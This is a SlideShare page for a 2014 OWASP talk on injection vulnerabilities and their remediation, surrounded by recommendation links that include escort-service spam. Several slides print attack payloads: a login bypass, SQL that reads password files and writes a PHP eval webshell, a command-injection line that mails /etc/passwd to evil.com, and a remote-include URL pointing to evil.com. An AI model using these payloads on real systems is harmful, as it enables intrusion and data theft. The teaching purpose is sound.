FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 

Último (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 

OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

  • 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  • 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  • 3. • Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  • 4. How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
  • 5. What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  • 6. Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  • 7. Injection Fails Mix of “data” and “commands”.
  • 8. IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  • 9. SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  • 10. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 11. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 12. SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  • 13. SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  • 14. SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  • 15. SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
  • 16. HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  • 17. HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  • 18. XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  • 19. XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
  • 20. Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  • 21. Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
  • 22. LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  • 23. LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
  • 24. Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  • 25. Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
  • 26. Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  • 27. Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  • 28. Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
  • 29. Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  • 30. Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.